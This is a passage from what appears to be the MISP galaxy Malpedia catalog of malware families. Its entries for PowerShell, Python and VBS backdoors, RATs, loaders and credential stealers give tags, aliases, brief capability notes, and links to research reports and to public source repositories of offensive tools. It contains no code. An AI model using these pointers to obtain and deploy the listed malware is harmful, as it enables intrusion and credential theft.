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<td><a href="https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf">https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf</a></td>
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<td><a href="https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf">https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf</a></td>
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<tr>
<td><a href="https://isc.sans.edu/diary/26918">https://isc.sans.edu/diary/26918</a></td>
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<tr>
<td><a href="https://github.com/mhaskar/Octopus">https://github.com/mhaskar/Octopus</a></td>
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OilRig

The tag is: misp-galaxy:malpedia="OilRig"

OilRig is also known as:

Table 1224. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig</a></td>
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<td><a href="https://twitter.com/MJDutch/status/1074820959784321026?s=19">https://twitter.com/MJDutch/status/1074820959784321026?s=19</a></td>
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<tr>
<td><a href="https://threatpost.com/oilrig-apt-unique-backdoor/157646/">https://threatpost.com/oilrig-apt-unique-backdoor/157646/</a></td>
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POSHSPY

The tag is: misp-galaxy:malpedia="POSHSPY"

POSHSPY is also known as:

Table 1225. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html">https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html</a></td>
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<tr>
<td><a href="https://github.com/matthewdunwoody/POSHSPY">https://github.com/matthewdunwoody/POSHSPY</a></td>
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PowerBrace

The tag is: misp-galaxy:malpedia="PowerBrace"

PowerBrace is also known as:

Table 1226. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerbrace">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerbrace</a></td>
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<tr>
<td><a href="https://norfolkinfosec.com/osint-reporting-on-dprk-and-ta505-overlap/">https://norfolkinfosec.com/osint-reporting-on-dprk-and-ta505-overlap/</a></td>
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PowerPepper

The tag is: misp-galaxy:malpedia="PowerPepper"

PowerPepper is also known as:
Table 1227. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper</a></td>
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<tr>
<td><a href="https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/">https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/</a></td>
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<tr>
<td><a href="https://twitter.com/InQuest/status/1285295975347650562">https://twitter.com/InQuest/status/1285295975347650562</a></td>
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**POWERPIPE**

The tag is: *misp-galaxy:malpedia="POWERPIPE"*

POWERPIPE is also known as:

Table 1228. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe</a></td>
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**powershell_web_backdoor**

The tag is: *misp-galaxy:malpedia="powershell_web_backdoor"*

powershell_web_backdoor is also known as:

Table 1229. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor</a></td>
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<tr>
<td><a href="https://github.com/chrisjd20/powershell_web_backdoor">https://github.com/chrisjd20/powershell_web_backdoor</a></td>
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**PowerShower**

The tag is: *misp-galaxy:malpedia="PowerShower"*

PowerShower is also known as:

Table 1230. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/">https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/</a></td>
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</table>
POWERSOURCE

POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.

The tag is: misp-galaxy:malpedia="POWERSOURCE"

POWERSOURCE is also known as:

Table 1231. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html">https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html</a></td>
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PowerSpritz

The tag is: misp-galaxy:malpedia="PowerSpritz"

PowerSpritz is also known as:

Table 1232. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz</a></td>
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</table>

POWERSTATS

POWERSTATS is a backdoor written in powershell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.

The tag is: misp-galaxy:malpedia="POWERSTATS"

POWERSTATS is also known as:

- Valyria

Table 1233. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats</a></td>
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The tag is: misp-galaxy:malpedia="POWERTON"

POWERTON is also known as:

Table 1234. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-trinity">https://www.secureworks.com/research/threat-profiles/cobalt-trinity</a></td>
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<tr>
<td><a href="https://norfolkinfosec.com/apt33-powershell-malware/">https://norfolkinfosec.com/apt33-powershell-malware/</a></td>
</tr>
<tr>
<td><a href="https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/">https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/</a></td>
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**PowerWare**

The tag is: `misp-galaxy:malpedia="PowerWare"`

PowerWare is also known as:

*Table 1235. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware</a></td>
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</tbody>
</table>

**PowerZure**

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft's cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.

The tag is: `misp-galaxy:malpedia="PowerZure"`

PowerZure is also known as:

*Table 1236. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure</a></td>
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<tr>
<td><a href="https://github.com/hausec/PowerZure">https://github.com/hausec/PowerZure</a></td>
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</table>

**PowGoop**

DLL loader that decrypts and runs a powershell-based downloader.

The tag is: `misp-galaxy:malpedia="PowGoop"`

PowGoop is also known as:

*Table 1237. Table References*

<table>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop</a></td>
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<td><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east">https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/thanos-ransomware/">https://unit42.paloaltonetworks.com/thanos-ransomware/</a></td>
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<tr>
<td><a href="https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/">https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/</a></td>
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</table>
**POWRUNER**

The tag is: `misp-galaxy:malpedia="POWRUNER"`

POWRUNER is also known as:

Table 1238. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner</a></td>
<td></td>
</tr>
</tbody>
</table>

**PresFox**

The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.

The tag is: `misp-galaxy:malpedia="PresFox"`

PresFox is also known as:

Table 1239. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox</a></td>
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<tr>
<td><a href="https://twitter.com/kafeine/status/1092000556598677504">https://twitter.com/kafeine/status/1092000556598677504</a></td>
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**QUADAGENT**

The tag is: `misp-galaxy:malpedia="QUADAGENT"`

QUADAGENT is also known as:

Table 1240. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent</a></td>
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<td><a href="https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeeErc/edit#heading=h.ez428aw98bca">https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeeErc/edit#heading=h.ez428aw98bca</a></td>
<td></td>
</tr>
<tr>
<td><a href="https://youtu.be/pBDu8EGWRC4?t=2492">https://youtu.be/pBDu8EGWRC4?t=2492</a></td>
<td></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/">https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/</a></td>
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RogueRobin

The tag is: *misp-galaxy:malpedia*="RogueRobin"

RogueRobin is also known as:

*Table 1241. Table References*

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin</a></td>
</tr>
<tr>
<td><a href="https://docs.google.com/document/d/1oYX3uN6Kx1X_StzTH0sOyFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca">https://docs.google.com/document/d/1oYX3uN6Kx1X_StzTH0sOyFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca</a></td>
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Schtasks

The tag is: *misp-galaxy:malpedia*="Schtasks"

Schtasks is also known as:

*Table 1242. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks</a></td>
</tr>
<tr>
<td><a href="https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1">https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1</a></td>
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skyrat

The tag is: *misp-galaxy:malpedia*="skyrat"

skyrat is also known as:

*Table 1243. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat</a></td>
</tr>
<tr>
<td><a href="https://github.com/YSCHGroup/SkyRAT">https://github.com/YSCHGroup/SkyRAT</a></td>
</tr>
</tbody>
</table>

sLoad

sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted
banks), as well as load external binaries.

The tag is: `misp-galaxy:malpedia="sLoad"

sLoad is also known as:

- Starslord

Table 1244. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload</a></td>
</tr>
<tr>
<td><a href="https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/">https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/</a></td>
</tr>
<tr>
<td><a href="https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/">https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/</a></td>
</tr>
<tr>
<td><a href="https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan">https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan</a></td>
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Snugy

The tag is: `misp-galaxy:malpedia="Snugy"

Snugy is also known as:

Table 1245. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/">https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/</a></td>
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</table>

Swrort Stager

The tag is: `misp-galaxy:malpedia="Swrort Stager"`
Swrort Stager is also known as:

Table 1246. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.swrort">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.swrort</a></td>
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**Tater PrivEsc**

The tag is: `misp-galaxy:malpedia="Tater PrivEsc"`

Tater PrivEsc is also known as:

Table 1247. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater</a></td>
</tr>
<tr>
<td><a href="https://github.com/Kevin-Robertson/Tater">https://github.com/Kevin-Robertson/Tater</a></td>
</tr>
</tbody>
</table>

**ThunderShell**

The tag is: `misp-galaxy:malpedia="ThunderShell"`

ThunderShell is also known as:

Table 1248. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell</a></td>
</tr>
<tr>
<td><a href="https://github.com/Mr-Un1k0d3r/ThunderShell">https://github.com/Mr-Un1k0d3r/ThunderShell</a></td>
</tr>
</tbody>
</table>

**Unidentified PS 001**

Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.

The tag is: `misp-galaxy:malpedia="Unidentified PS 001"`

Unidentified PS 001 is also known as:

Table 1249. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001</a></td>
</tr>
<tr>
<td><a href="https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/">https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/</a></td>
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</table>
**WannaMine**

The tag is: `misp-galaxy:malpedia="WannaMine"`

WannaMine is also known as:

*Table 1250. Table References*

<table>
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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine</a></td>
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<tr>
<td><a href="https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry">https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry</a></td>
</tr>
<tr>
<td><a href="https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/">https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/</a></td>
</tr>
<tr>
<td><a href="https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/">https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/</a></td>
</tr>
<tr>
<td><a href="https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/">https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/</a></td>
</tr>
</tbody>
</table>

**WannaRen Downloader**

The tag is: `misp-galaxy:malpedia="WannaRen Downloader"`

WannaRen Downloader is also known as:

*Table 1251. Table References*

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/blackorbird/status/1247834024711577601">https://twitter.com/blackorbird/status/1247834024711577601</a></td>
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</table>

**WMImplant**

The tag is: `misp-galaxy:malpedia="WMImplant"`

WMImplant is also known as:

*Table 1252. Table References*

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html">https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html</a></td>
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</table>
Archivist

The tag is: misp-galaxy:malpedia="Archivist"

Archivist is also known as:

Table 1253. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist">https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist</a></td>
</tr>
<tr>
<td><a href="https://github.com/NullArray/Archivist">https://github.com/NullArray/Archivist</a></td>
</tr>
</tbody>
</table>

Ares

Ares is a Python RAT.

The tag is: misp-galaxy:malpedia="Ares"

Ares is also known as:

Table 1254. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.ares">https://malpedia.caad.fkie.fraunhofer.de/details/py.ares</a></td>
</tr>
<tr>
<td><a href="https://github.com/sweetsoftware/Ares">https://github.com/sweetsoftware/Ares</a></td>
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BrickerBot

The tag is: misp-galaxy:malpedia="BrickerBot"

BrickerBot is also known as:

Table 1255. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot">https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot</a></td>
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<tr>
<td><a href="http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f">http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f</a></td>
</tr>
<tr>
<td><a href="https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A">https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A</a></td>
</tr>
<tr>
<td><a href="http://seclists.org/fullDisclosure/2017/Mar/7">http://seclists.org/fullDisclosure/2017/Mar/7</a></td>
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</table>
**DropboxC2C**

The tag is: `misp-galaxy:malpedia="DropboxC2C"`

DropboxC2C is also known as:

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<tr>
<td><strong>Links</strong></td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c">malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c</a></td>
</tr>
<tr>
<td><a href="https://github.com/0x09AL/DropboxC2C">github.com/0x09AL/DropboxC2C</a></td>
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</table>

**KeyPlexer**

The tag is: `misp-galaxy:malpedia="KeyPlexer"`

KeyPlexer is also known as:

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<th>Table 1257. Table References</th>
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<tr>
<td><strong>Links</strong></td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer">malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer</a></td>
</tr>
<tr>
<td><a href="https://github.com/nairuzabulhul/KeyPlexer">github.com/nairuzabulhul/KeyPlexer</a></td>
</tr>
</tbody>
</table>

**LaZagne**

The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.

The tag is: `misp-galaxy:malpedia="LaZagne"`

LaZagne is also known as:

<table>
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<th>Table 1258. Table References</th>
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<td><strong>Links</strong></td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne">malpedia.caad.fkie.fraunhofer.de/details/py.lazagne</a></td>
</tr>
<tr>
<td><a href="https://github.com/AlessandroZ/LaZagne">github.com/AlessandroZ/LaZagne</a></td>
</tr>
</tbody>
</table>
N3Cr0m0rPh

An IRC bot written in (obfuscated) Python code. Distributed in attack campaign FreakOut, written by author Freak/Fl0urite and development potentially dating back as far as 2015.

The tag is: misp-galaxy:malpedia="N3Cr0m0rPh"

N3Cr0m0rPh is also known as:

- FreakOut

Table 1259. Table References

<table>
<thead>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph">https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph</a></td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/">https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/</a></td>
</tr>
<tr>
<td><a href="https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/">https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/</a></td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/">https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/</a></td>
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NetWorm

The tag is: misp-galaxy:malpedia="NetWorm"

NetWorm is also known as:

Table 1260. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.networm">https://malpedia.caad.fkie.fraunhofer.de/details/py.networm</a></td>
</tr>
<tr>
<td><a href="https://github.com/pylyf/NetWorm">https://github.com/pylyf/NetWorm</a></td>
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PIRAT

The tag is: misp-galaxy:malpedia="PIRAT"

PIRAT is also known as:

Table 1261. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat">https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat</a></td>
</tr>
<tr>
<td><a href="https://vk.com/m228228?w=wall306895781_177">https://vk.com/m228228?w=wall306895781_177</a></td>
</tr>
</tbody>
</table>
Poet RAT

Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.

The tag is: `misp-galaxy:malpedia="Poet RAT"`

Poet RAT is also known as:

Table 1262. Table References

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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat">https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
</tr>
<tr>
<td><a href="https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020ICSREPORTEN.pdf">https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020ICSREPORTEN.pdf</a></td>
</tr>
<tr>
<td><a href="https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/">https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/</a></td>
</tr>
<tr>
<td><a href="https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/">https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2020/10/poetrat-update.html">https://blog.talosintelligence.com/2020/10/poetrat-update.html</a></td>
</tr>
</tbody>
</table>

pupy (Python)

The tag is: `misp-galaxy:malpedia="pupy (Python)"`

pupy (Python) is also known as:

Table 1263. Table References

<table>
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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy">https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-gypsy">https://www.secureworks.com/research/threat-profiles/cobalt-gypsy</a></td>
</tr>
<tr>
<td><a href="https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf">https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-trinity">https://www.secureworks.com/research/threat-profiles/cobalt-trinity</a></td>
</tr>
<tr>
<td><a href="https://github.com/n1nj4sec/pupy">https://github.com/n1nj4sec/pupy</a></td>
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</table>

PyArk

The tag is: `misp-galaxy:malpedia="PyArk"`

PyArk is also known as:
PyVil

PyVil RAT

The tag is: `misp-galaxy:malpedia="PyVil"`

PyVil is also known as:

Table 1265. Table References

<table>
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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil">https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil</a></td>
</tr>
<tr>
<td><a href="https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat">https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/ESETresearch/status/1360178593968623617">https://twitter.com/ESETresearch/status/1360178593968623617</a></td>
</tr>
</tbody>
</table>

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

The tag is: `misp-galaxy:malpedia="Responder"`

Responder is also known as:

- SpiderLabs Responder

Table 1266. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.responder">https://malpedia.caad.fkie.fraunhofer.de/details/py.responder</a></td>
</tr>
<tr>
<td><a href="https://github.com/lgandx/Responder">https://github.com/lgandx/Responder</a></td>
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</tbody>
</table>

Saphyra

The tag is: `misp-galaxy:malpedia="Saphyra"`

Saphyra is also known as:

Table 1267. Table References
**SpaceCow**

The tag is: `misp-galaxy:malpedia="SpaceCow"`

SpaceCow is also known as:

*Table 1268. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow">https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow</a></td>
</tr>
<tr>
<td><a href="https://github.com/TheSph1nx/SpaceCow">https://github.com/TheSph1nx/SpaceCow</a></td>
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**stealler**

The tag is: `misp-galaxy:malpedia="stealler"`

stealler is also known as:

*Table 1269. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler">https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler</a></td>
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</table>

**Stitch**

The tag is: `misp-galaxy:malpedia="Stitch"`

Stitch is also known as:

*Table 1270. Table References*

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch">https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch</a></td>
</tr>
<tr>
<td><a href="https://github.com/nathanlopez/Stitch">https://github.com/nathanlopez/Stitch</a></td>
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</table>
unidentified_001
The tag is: misp-galaxy:malpedia="unidentified_001"

unidentified_001 is also known as:

Table 1271. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001">https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001</a></td>
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unidentified_002
The tag is: misp-galaxy:malpedia="unidentified_002"

unidentified_002 is also known as:

Table 1272. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002">https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002</a></td>
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unidentified_003
The tag is: misp-galaxy:malpedia="unidentified_003"

unidentified_003 is also known as:

Table 1273. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003">https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003</a></td>
</tr>
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</table>

FlexiSpy (symbian)
The tag is: misp-galaxy:malpedia="FlexiSpy (symbian)"

FlexiSpy (symbian) is also known as:

Table 1274. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy">https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy</a></td>
</tr>
</tbody>
</table>

forbiks
The tag is: misp-galaxy:malpedia="forbiks"
forbiks is also known as:

- Forbix

Table 1275. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks</a></td>
</tr>
<tr>
<td><a href="https://persianov.net/windows-worms-forbix-worm-analysis">https://persianov.net/windows-worms-forbix-worm-analysis</a></td>
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</table>

GGLdr

The tag is: `misp-galaxy:malpedia="GGLdr"`

GGLdr is also known as:

Table 1276. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr</a></td>
</tr>
<tr>
<td><a href="https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control">https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control</a></td>
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Grinju Downloader

The tag is: `misp-galaxy:malpedia="Grinju Downloader"`

Grinju Downloader is also known as:

Table 1277. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju">https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju</a></td>
</tr>
<tr>
<td><a href="https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8">https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8</a></td>
</tr>
<tr>
<td><a href="https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce">https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce</a></td>
</tr>
</tbody>
</table>

HALFBAKED

